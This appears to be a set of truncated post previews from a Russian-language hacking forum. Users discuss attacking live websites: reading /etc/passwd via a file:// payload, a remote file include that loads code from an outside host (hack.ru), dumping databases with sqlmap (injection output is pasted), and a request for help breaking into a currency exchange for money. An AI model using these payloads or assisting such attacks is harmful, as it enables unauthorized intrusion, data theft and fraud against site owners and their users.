Separate names with a comma.
file:///etc/passwd да вот только что нашел,ток в другом месте,это у же другой запрос(пост).Вот etcpasswd нашел.Подскажите что делать дальше
file:///etc/passwd да вот только что нашел,ток в другом месте root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh...
У меня вопрос,пытаюсь слить бд.Но в ней присутствуют слова на кирилице,и в дампе это выглядет вот так ???????.Что можно сделать?...
false positive - это нормально
в i.txt <?php phpinfo();?> - открыл как текстовый тхт. file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((
Ну а как мне увидить phpinfo атакуемого сайта?
Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).
Пробую слить в дампере,сливает но туго(.Мап выдает вот такое [13:30:30] [INFO] the back-end DBMS is Microsoft SQL Server web server operating...
Я в а....е от сабжа ТС.Это выглидет так ребята у меня трипак нужно сломать супер обменник чтоб поднять МНЕ бабла.Кто поможет скажу спасибо.А...
Dirbuster
Acunetix
Подскажите актуальный на сегодняшний день крипроконтейнер.И есть ли такой софт,при запуске системы просит ввести пасс если пасс введен не верно...
А как в мапе раскрутить?
[12:47:12] [INFO] testing MySQL [12:47:12] [PAYLOAD] -8319 [12:47:21] [WARNING] reflective value(s) found and filtering out [12:47:21] [DEBUG]...
sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* (URI) Type: error-based Title: MySQL OR...